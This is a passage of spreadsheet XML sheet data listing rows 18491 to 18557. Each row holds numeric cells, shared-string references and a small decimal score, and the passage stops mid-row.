      <c r="A18491" s="1">
        <v>23716.0</v>
      </c>
      <c r="B18491" s="2">
        <v>7196714.0</v>
      </c>
      <c r="C18491" s="2" t="s">
        <v>17822</v>
      </c>
      <c r="D18491" s="2">
        <v>1.0</v>
      </c>
      <c r="E18491" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18491" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18492" ht="15.75" customHeight="1">
      <c r="A18492" s="1">
        <v>25606.0</v>
      </c>
      <c r="B18492" s="2">
        <v>1.4396325E7</v>
      </c>
      <c r="C18492" s="2" t="s">
        <v>17823</v>
      </c>
      <c r="D18492" s="2">
        <v>1.0</v>
      </c>
      <c r="E18492" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18492" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18493" ht="15.75" customHeight="1">
      <c r="A18493" s="1">
        <v>29045.0</v>
      </c>
      <c r="B18493" s="2">
        <v>3.0205177E7</v>
      </c>
      <c r="C18493" s="2" t="s">
        <v>17821</v>
      </c>
      <c r="D18493" s="2">
        <v>1.0</v>
      </c>
      <c r="E18493" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18493" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18494" ht="15.75" customHeight="1">
      <c r="A18494" s="1">
        <v>29131.0</v>
      </c>
      <c r="B18494" s="2">
        <v>3.052636E7</v>
      </c>
      <c r="C18494" s="2" t="s">
        <v>17824</v>
      </c>
      <c r="D18494" s="2">
        <v>1.0</v>
      </c>
      <c r="E18494" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18494" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18495" ht="15.75" customHeight="1">
      <c r="A18495" s="1">
        <v>30284.0</v>
      </c>
      <c r="B18495" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C18495" s="2" t="s">
        <v>17825</v>
      </c>
      <c r="D18495" s="2">
        <v>1.0</v>
      </c>
      <c r="E18495" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18495" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18496" ht="15.75" customHeight="1">
      <c r="A18496" s="1">
        <v>30878.0</v>
      </c>
      <c r="B18496" s="2">
        <v>4.6311086E7</v>
      </c>
      <c r="C18496" s="2" t="s">
        <v>17826</v>
      </c>
      <c r="D18496" s="2">
        <v>1.0</v>
      </c>
      <c r="E18496" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18496" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18497" ht="15.75" customHeight="1">
      <c r="A18497" s="1">
        <v>32067.0</v>
      </c>
      <c r="B18497" s="2">
        <v>5379390.0</v>
      </c>
      <c r="C18497" s="2" t="s">
        <v>17827</v>
      </c>
      <c r="D18497" s="2">
        <v>1.0</v>
      </c>
      <c r="E18497" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18497" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18498" ht="15.75" customHeight="1">
      <c r="A18498" s="1">
        <v>32194.0</v>
      </c>
      <c r="B18498" s="2">
        <v>5.4746733E7</v>
      </c>
      <c r="C18498" s="2" t="s">
        <v>17828</v>
      </c>
      <c r="D18498" s="2">
        <v>1.0</v>
      </c>
      <c r="E18498" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18498" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18499" ht="15.75" customHeight="1">
      <c r="A18499" s="1">
        <v>10543.0</v>
      </c>
      <c r="B18499" s="2">
        <v>1.2415134E7</v>
      </c>
      <c r="C18499" s="2" t="s">
        <v>17829</v>
      </c>
      <c r="D18499" s="2">
        <v>1.0</v>
      </c>
      <c r="E18499" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18499" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="18500" ht="15.75" customHeight="1">
      <c r="A18500" s="1">
        <v>22283.0</v>
      </c>
      <c r="B18500" s="2">
        <v>3.3326148E7</v>
      </c>
      <c r="C18500" s="2" t="s">
        <v>17830</v>
      </c>
      <c r="D18500" s="2">
        <v>1.0</v>
      </c>
      <c r="E18500" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18500" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="18501" ht="15.75" customHeight="1">
      <c r="A18501" s="1">
        <v>22397.0</v>
      </c>
      <c r="B18501" s="2">
        <v>3.5490577E7</v>
      </c>
      <c r="C18501" s="2" t="s">
        <v>17831</v>
      </c>
      <c r="D18501" s="2">
        <v>1.0</v>
      </c>
      <c r="E18501" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18501" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="18502" ht="15.75" customHeight="1">
      <c r="A18502" s="1">
        <v>22715.0</v>
      </c>
      <c r="B18502" s="2">
        <v>4.3399084E7</v>
      </c>
      <c r="C18502" s="2" t="s">
        <v>17832</v>
      </c>
      <c r="D18502" s="2">
        <v>1.0</v>
      </c>
      <c r="E18502" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18502" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="18503" ht="15.75" customHeight="1">
      <c r="A18503" s="1">
        <v>17761.0</v>
      </c>
      <c r="B18503" s="2">
        <v>5.073031E7</v>
      </c>
      <c r="C18503" s="2" t="s">
        <v>17833</v>
      </c>
      <c r="D18503" s="2">
        <v>1.0</v>
      </c>
      <c r="E18503" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18503" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="18504" ht="15.75" customHeight="1">
      <c r="A18504" s="1">
        <v>25829.0</v>
      </c>
      <c r="B18504" s="2">
        <v>1.4769933E7</v>
      </c>
      <c r="C18504" s="2" t="s">
        <v>17834</v>
      </c>
      <c r="D18504" s="2">
        <v>1.0</v>
      </c>
      <c r="E18504" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18504" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="18505" ht="15.75" customHeight="1">
      <c r="A18505" s="1">
        <v>34144.0</v>
      </c>
      <c r="B18505" s="2">
        <v>9847108.0</v>
      </c>
      <c r="C18505" s="2" t="s">
        <v>17835</v>
      </c>
      <c r="D18505" s="2">
        <v>1.0</v>
      </c>
      <c r="E18505" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18505" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="18506" ht="15.75" customHeight="1">
      <c r="A18506" s="1">
        <v>2680.0</v>
      </c>
      <c r="B18506" s="2">
        <v>3.4798984E7</v>
      </c>
      <c r="C18506" s="2" t="s">
        <v>17836</v>
      </c>
      <c r="D18506" s="2">
        <v>1.0</v>
      </c>
      <c r="E18506" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18506" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="18507" ht="15.75" customHeight="1">
      <c r="A18507" s="1">
        <v>14482.0</v>
      </c>
      <c r="B18507" s="2">
        <v>3.9552376E7</v>
      </c>
      <c r="C18507" s="2" t="s">
        <v>17837</v>
      </c>
      <c r="D18507" s="2">
        <v>1.0</v>
      </c>
      <c r="E18507" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18507" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="18508" ht="15.75" customHeight="1">
      <c r="A18508" s="1">
        <v>21609.0</v>
      </c>
      <c r="B18508" s="2">
        <v>2.4425827E7</v>
      </c>
      <c r="C18508" s="2" t="s">
        <v>17838</v>
      </c>
      <c r="D18508" s="2">
        <v>1.0</v>
      </c>
      <c r="E18508" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18508" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="18509" ht="15.75" customHeight="1">
      <c r="A18509" s="1">
        <v>24091.0</v>
      </c>
      <c r="B18509" s="2">
        <v>9765994.0</v>
      </c>
      <c r="C18509" s="2" t="s">
        <v>17839</v>
      </c>
      <c r="D18509" s="2">
        <v>1.0</v>
      </c>
      <c r="E18509" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18509" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="18510" ht="15.75" customHeight="1">
      <c r="A18510" s="1">
        <v>32525.0</v>
      </c>
      <c r="B18510" s="2">
        <v>5731183.0</v>
      </c>
      <c r="C18510" s="2" t="s">
        <v>17840</v>
      </c>
      <c r="D18510" s="2">
        <v>1.0</v>
      </c>
      <c r="E18510" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18510" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="18511" ht="15.75" customHeight="1">
      <c r="A18511" s="1">
        <v>13309.0</v>
      </c>
      <c r="B18511" s="2">
        <v>3.4537687E7</v>
      </c>
      <c r="C18511" s="2" t="s">
        <v>17841</v>
      </c>
      <c r="D18511" s="2">
        <v>1.0</v>
      </c>
      <c r="E18511" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18511" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="18512" ht="15.75" customHeight="1">
      <c r="A18512" s="1">
        <v>24143.0</v>
      </c>
      <c r="B18512" s="2">
        <v>1.0068012E7</v>
      </c>
      <c r="C18512" s="2" t="s">
        <v>17842</v>
      </c>
      <c r="D18512" s="2">
        <v>1.0</v>
      </c>
      <c r="E18512" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18512" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="18513" ht="15.75" customHeight="1">
      <c r="A18513" s="1">
        <v>25016.0</v>
      </c>
      <c r="B18513" s="2">
        <v>1.2780157E7</v>
      </c>
      <c r="C18513" s="2" t="s">
        <v>17843</v>
      </c>
      <c r="D18513" s="2">
        <v>1.0</v>
      </c>
      <c r="E18513" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18513" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="18514" ht="15.75" customHeight="1">
      <c r="A18514" s="1">
        <v>30023.0</v>
      </c>
      <c r="B18514" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C18514" s="2" t="s">
        <v>17764</v>
      </c>
      <c r="D18514" s="2">
        <v>1.0</v>
      </c>
      <c r="E18514" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18514" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="18515" ht="15.75" customHeight="1">
      <c r="A18515" s="1">
        <v>2123.0</v>
      </c>
      <c r="B18515" s="2">
        <v>3.1392499E7</v>
      </c>
      <c r="C18515" s="2" t="s">
        <v>17844</v>
      </c>
      <c r="D18515" s="2">
        <v>1.0</v>
      </c>
      <c r="E18515" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18515" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="18516" ht="15.75" customHeight="1">
      <c r="A18516" s="1">
        <v>14373.0</v>
      </c>
      <c r="B18516" s="2">
        <v>3.8983328E7</v>
      </c>
      <c r="C18516" s="2" t="s">
        <v>17845</v>
      </c>
      <c r="D18516" s="2">
        <v>1.0</v>
      </c>
      <c r="E18516" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18516" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="18517" ht="15.75" customHeight="1">
      <c r="A18517" s="1">
        <v>16341.0</v>
      </c>
      <c r="B18517" s="2">
        <v>4.6061066E7</v>
      </c>
      <c r="C18517" s="2" t="s">
        <v>17846</v>
      </c>
      <c r="D18517" s="2">
        <v>1.0</v>
      </c>
      <c r="E18517" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18517" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="18518" ht="15.75" customHeight="1">
      <c r="A18518" s="1">
        <v>19644.0</v>
      </c>
      <c r="B18518" s="2">
        <v>5.6298971E7</v>
      </c>
      <c r="C18518" s="2" t="s">
        <v>17847</v>
      </c>
      <c r="D18518" s="2">
        <v>1.0</v>
      </c>
      <c r="E18518" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18518" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="18519" ht="15.75" customHeight="1">
      <c r="A18519" s="1">
        <v>28970.0</v>
      </c>
      <c r="B18519" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C18519" s="2" t="s">
        <v>17848</v>
      </c>
      <c r="D18519" s="2">
        <v>1.0</v>
      </c>
      <c r="E18519" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18519" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="18520" ht="15.75" customHeight="1">
      <c r="A18520" s="1">
        <v>29883.0</v>
      </c>
      <c r="B18520" s="2">
        <v>3607000.0</v>
      </c>
      <c r="C18520" s="2" t="s">
        <v>17849</v>
      </c>
      <c r="D18520" s="2">
        <v>1.0</v>
      </c>
      <c r="E18520" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18520" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="18521" ht="15.75" customHeight="1">
      <c r="A18521" s="1">
        <v>34088.0</v>
      </c>
      <c r="B18521" s="2">
        <v>9685943.0</v>
      </c>
      <c r="C18521" s="2" t="s">
        <v>17850</v>
      </c>
      <c r="D18521" s="2">
        <v>1.0</v>
      </c>
      <c r="E18521" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18521" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="18522" ht="15.75" customHeight="1">
      <c r="A18522" s="1">
        <v>5068.0</v>
      </c>
      <c r="B18522" s="2">
        <v>4.4388055E7</v>
      </c>
      <c r="C18522" s="2" t="s">
        <v>17851</v>
      </c>
      <c r="D18522" s="2">
        <v>1.0</v>
      </c>
      <c r="E18522" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18522" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="18523" ht="15.75" customHeight="1">
      <c r="A18523" s="1">
        <v>6340.0</v>
      </c>
      <c r="B18523" s="2">
        <v>4.8306299E7</v>
      </c>
      <c r="C18523" s="2" t="s">
        <v>17852</v>
      </c>
      <c r="D18523" s="2">
        <v>1.0</v>
      </c>
      <c r="E18523" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18523" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="18524" ht="15.75" customHeight="1">
      <c r="A18524" s="1">
        <v>19370.0</v>
      </c>
      <c r="B18524" s="2">
        <v>5.5471169E7</v>
      </c>
      <c r="C18524" s="2" t="s">
        <v>17853</v>
      </c>
      <c r="D18524" s="2">
        <v>1.0</v>
      </c>
      <c r="E18524" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18524" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="18525" ht="15.75" customHeight="1">
      <c r="A18525" s="1">
        <v>21217.0</v>
      </c>
      <c r="B18525" s="2">
        <v>1.9592771E7</v>
      </c>
      <c r="C18525" s="2" t="s">
        <v>17854</v>
      </c>
      <c r="D18525" s="2">
        <v>1.0</v>
      </c>
      <c r="E18525" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18525" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="18526" ht="15.75" customHeight="1">
      <c r="A18526" s="1">
        <v>30183.0</v>
      </c>
      <c r="B18526" s="2">
        <v>3.7189812E7</v>
      </c>
      <c r="C18526" s="2" t="s">
        <v>17855</v>
      </c>
      <c r="D18526" s="2">
        <v>1.0</v>
      </c>
      <c r="E18526" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18526" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="18527" ht="15.75" customHeight="1">
      <c r="A18527" s="1">
        <v>31696.0</v>
      </c>
      <c r="B18527" s="2">
        <v>5.1967394E7</v>
      </c>
      <c r="C18527" s="2" t="s">
        <v>17856</v>
      </c>
      <c r="D18527" s="2">
        <v>1.0</v>
      </c>
      <c r="E18527" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18527" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="18528" ht="15.75" customHeight="1">
      <c r="A18528" s="1">
        <v>27500.0</v>
      </c>
      <c r="B18528" s="2">
        <v>2.2068997E7</v>
      </c>
      <c r="C18528" s="2" t="s">
        <v>17857</v>
      </c>
      <c r="D18528" s="2">
        <v>1.0</v>
      </c>
      <c r="E18528" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18528" s="2">
        <v>0.1048387096774194</v>
      </c>
    </row>
    <row r="18529" ht="15.75" customHeight="1">
      <c r="A18529" s="1">
        <v>30181.0</v>
      </c>
      <c r="B18529" s="2">
        <v>3.7167549E7</v>
      </c>
      <c r="C18529" s="2" t="s">
        <v>17858</v>
      </c>
      <c r="D18529" s="2">
        <v>1.0</v>
      </c>
      <c r="E18529" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18529" s="2">
        <v>0.1048387096774194</v>
      </c>
    </row>
    <row r="18530" ht="15.75" customHeight="1">
      <c r="A18530" s="1">
        <v>20065.0</v>
      </c>
      <c r="B18530" s="2">
        <v>8530195.0</v>
      </c>
      <c r="C18530" s="2" t="s">
        <v>17859</v>
      </c>
      <c r="D18530" s="2">
        <v>1.0</v>
      </c>
      <c r="E18530" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18530" s="2">
        <v>0.1048387096774193</v>
      </c>
    </row>
    <row r="18531" ht="15.75" customHeight="1">
      <c r="A18531" s="1">
        <v>927.0</v>
      </c>
      <c r="B18531" s="2">
        <v>2.2341626E7</v>
      </c>
      <c r="C18531" s="2" t="s">
        <v>17860</v>
      </c>
      <c r="D18531" s="2">
        <v>1.0</v>
      </c>
      <c r="E18531" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18531" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="18532" ht="15.75" customHeight="1">
      <c r="A18532" s="1">
        <v>438.0</v>
      </c>
      <c r="B18532" s="2">
        <v>1.7015984E7</v>
      </c>
      <c r="C18532" s="2" t="s">
        <v>17861</v>
      </c>
      <c r="D18532" s="2">
        <v>1.0</v>
      </c>
      <c r="E18532" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18532" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18533" ht="15.75" customHeight="1">
      <c r="A18533" s="1">
        <v>808.0</v>
      </c>
      <c r="B18533" s="2">
        <v>2.1347598E7</v>
      </c>
      <c r="C18533" s="2" t="s">
        <v>17862</v>
      </c>
      <c r="D18533" s="2">
        <v>1.0</v>
      </c>
      <c r="E18533" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18533" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18534" ht="15.75" customHeight="1">
      <c r="A18534" s="1">
        <v>1370.0</v>
      </c>
      <c r="B18534" s="2">
        <v>2.6015376E7</v>
      </c>
      <c r="C18534" s="2" t="s">
        <v>17863</v>
      </c>
      <c r="D18534" s="2">
        <v>1.0</v>
      </c>
      <c r="E18534" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18534" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18535" ht="15.75" customHeight="1">
      <c r="A18535" s="1">
        <v>1371.0</v>
      </c>
      <c r="B18535" s="2">
        <v>2.6015376E7</v>
      </c>
      <c r="C18535" s="2" t="s">
        <v>17864</v>
      </c>
      <c r="D18535" s="2">
        <v>1.0</v>
      </c>
      <c r="E18535" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18535" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18536" ht="15.75" customHeight="1">
      <c r="A18536" s="1">
        <v>1757.0</v>
      </c>
      <c r="B18536" s="2">
        <v>2.8903244E7</v>
      </c>
      <c r="C18536" s="2" t="s">
        <v>17865</v>
      </c>
      <c r="D18536" s="2">
        <v>1.0</v>
      </c>
      <c r="E18536" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18536" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18537" ht="15.75" customHeight="1">
      <c r="A18537" s="1">
        <v>4568.0</v>
      </c>
      <c r="B18537" s="2">
        <v>4.2726405E7</v>
      </c>
      <c r="C18537" s="2" t="s">
        <v>17866</v>
      </c>
      <c r="D18537" s="2">
        <v>1.0</v>
      </c>
      <c r="E18537" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18537" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18538" ht="15.75" customHeight="1">
      <c r="A18538" s="1">
        <v>4781.0</v>
      </c>
      <c r="B18538" s="2">
        <v>4.3439879E7</v>
      </c>
      <c r="C18538" s="2" t="s">
        <v>17867</v>
      </c>
      <c r="D18538" s="2">
        <v>1.0</v>
      </c>
      <c r="E18538" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18538" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18539" ht="15.75" customHeight="1">
      <c r="A18539" s="1">
        <v>7589.0</v>
      </c>
      <c r="B18539" s="2">
        <v>5.1602724E7</v>
      </c>
      <c r="C18539" s="2" t="s">
        <v>17868</v>
      </c>
      <c r="D18539" s="2">
        <v>1.0</v>
      </c>
      <c r="E18539" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18539" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18540" ht="15.75" customHeight="1">
      <c r="A18540" s="1">
        <v>8230.0</v>
      </c>
      <c r="B18540" s="2">
        <v>5.3350333E7</v>
      </c>
      <c r="C18540" s="2" t="s">
        <v>17869</v>
      </c>
      <c r="D18540" s="2">
        <v>1.0</v>
      </c>
      <c r="E18540" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18540" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18541" ht="15.75" customHeight="1">
      <c r="A18541" s="1">
        <v>8725.0</v>
      </c>
      <c r="B18541" s="2">
        <v>5.4513585E7</v>
      </c>
      <c r="C18541" s="2" t="s">
        <v>17870</v>
      </c>
      <c r="D18541" s="2">
        <v>1.0</v>
      </c>
      <c r="E18541" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18541" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18542" ht="15.75" customHeight="1">
      <c r="A18542" s="1">
        <v>11009.0</v>
      </c>
      <c r="B18542" s="2">
        <v>1.7707258E7</v>
      </c>
      <c r="C18542" s="2" t="s">
        <v>17871</v>
      </c>
      <c r="D18542" s="2">
        <v>1.0</v>
      </c>
      <c r="E18542" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18542" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18543" ht="15.75" customHeight="1">
      <c r="A18543" s="1">
        <v>12705.0</v>
      </c>
      <c r="B18543" s="2">
        <v>3.0811994E7</v>
      </c>
      <c r="C18543" s="2" t="s">
        <v>17872</v>
      </c>
      <c r="D18543" s="2">
        <v>1.0</v>
      </c>
      <c r="E18543" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18543" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18544" ht="15.75" customHeight="1">
      <c r="A18544" s="1">
        <v>16499.0</v>
      </c>
      <c r="B18544" s="2">
        <v>4.657875E7</v>
      </c>
      <c r="C18544" s="2" t="s">
        <v>17873</v>
      </c>
      <c r="D18544" s="2">
        <v>1.0</v>
      </c>
      <c r="E18544" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18544" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18545" ht="15.75" customHeight="1">
      <c r="A18545" s="1">
        <v>16976.0</v>
      </c>
      <c r="B18545" s="2">
        <v>4.8300323E7</v>
      </c>
      <c r="C18545" s="2" t="s">
        <v>17874</v>
      </c>
      <c r="D18545" s="2">
        <v>1.0</v>
      </c>
      <c r="E18545" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18545" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18546" ht="15.75" customHeight="1">
      <c r="A18546" s="1">
        <v>17016.0</v>
      </c>
      <c r="B18546" s="2">
        <v>4.8449128E7</v>
      </c>
      <c r="C18546" s="2" t="s">
        <v>17875</v>
      </c>
      <c r="D18546" s="2">
        <v>1.0</v>
      </c>
      <c r="E18546" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18546" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18547" ht="15.75" customHeight="1">
      <c r="A18547" s="1">
        <v>18124.0</v>
      </c>
      <c r="B18547" s="2">
        <v>5.1780697E7</v>
      </c>
      <c r="C18547" s="2" t="s">
        <v>17876</v>
      </c>
      <c r="D18547" s="2">
        <v>1.0</v>
      </c>
      <c r="E18547" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18547" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18548" ht="15.75" customHeight="1">
      <c r="A18548" s="1">
        <v>22052.0</v>
      </c>
      <c r="B18548" s="2">
        <v>3.0392337E7</v>
      </c>
      <c r="C18548" s="2" t="s">
        <v>17877</v>
      </c>
      <c r="D18548" s="2">
        <v>1.0</v>
      </c>
      <c r="E18548" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18548" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18549" ht="15.75" customHeight="1">
      <c r="A18549" s="1">
        <v>22533.0</v>
      </c>
      <c r="B18549" s="2">
        <v>3.7905324E7</v>
      </c>
      <c r="C18549" s="2" t="s">
        <v>17878</v>
      </c>
      <c r="D18549" s="2">
        <v>1.0</v>
      </c>
      <c r="E18549" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18549" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18550" ht="15.75" customHeight="1">
      <c r="A18550" s="1">
        <v>22931.0</v>
      </c>
      <c r="B18550" s="2">
        <v>4.8671231E7</v>
      </c>
      <c r="C18550" s="2" t="s">
        <v>17879</v>
      </c>
      <c r="D18550" s="2">
        <v>1.0</v>
      </c>
      <c r="E18550" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18550" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18551" ht="15.75" customHeight="1">
      <c r="A18551" s="1">
        <v>23233.0</v>
      </c>
      <c r="B18551" s="2">
        <v>5289325.0</v>
      </c>
      <c r="C18551" s="2" t="s">
        <v>17880</v>
      </c>
      <c r="D18551" s="2">
        <v>1.0</v>
      </c>
      <c r="E18551" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18551" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18552" ht="15.75" customHeight="1">
      <c r="A18552" s="1">
        <v>23422.0</v>
      </c>
      <c r="B18552" s="2">
        <v>5.6419878E7</v>
      </c>
      <c r="C18552" s="2" t="s">
        <v>17881</v>
      </c>
      <c r="D18552" s="2">
        <v>1.0</v>
      </c>
      <c r="E18552" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18552" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18553" ht="15.75" customHeight="1">
      <c r="A18553" s="1">
        <v>24116.0</v>
      </c>
      <c r="B18553" s="2">
        <v>9972878.0</v>
      </c>
      <c r="C18553" s="2" t="s">
        <v>17882</v>
      </c>
      <c r="D18553" s="2">
        <v>1.0</v>
      </c>
      <c r="E18553" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18553" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18554" ht="15.75" customHeight="1">
      <c r="A18554" s="1">
        <v>25505.0</v>
      </c>
      <c r="B18554" s="2">
        <v>1.4143796E7</v>
      </c>
      <c r="C18554" s="2" t="s">
        <v>17883</v>
      </c>
      <c r="D18554" s="2">
        <v>1.0</v>
      </c>
      <c r="E18554" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18554" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18555" ht="15.75" customHeight="1">
      <c r="A18555" s="1">
        <v>25962.0</v>
      </c>
      <c r="B18555" s="2">
        <v>1.5267746E7</v>
      </c>
      <c r="C18555" s="2" t="s">
        <v>17884</v>
      </c>
      <c r="D18555" s="2">
        <v>1.0</v>
      </c>
      <c r="E18555" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18555" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18556" ht="15.75" customHeight="1">
      <c r="A18556" s="1">
        <v>26030.0</v>
      </c>
      <c r="B18556" s="2">
        <v>1.5395215E7</v>
      </c>
      <c r="C18556" s="2" t="s">
        <v>17885</v>
      </c>
      <c r="D18556" s="2">
        <v>1.0</v>
      </c>
      <c r="E18556" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18556" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18557" ht="15.75" customHeight="1">
      <c r="A18557" s="1">
        <v>29193.0</v>
      </c>
      <c r="B18557" s="2">
        <v>3.07315E7</v>
      </c>
      <c r="C18557" s="2" t="s">
        <v>17886</v>
      </c>
      <c r="D18557" s="2">
        <v>1.0</v>
      </c>
      <c r="E18557" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18557" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18558" ht="15.75" customHeight="1">
      <c r="A18558" s="1">
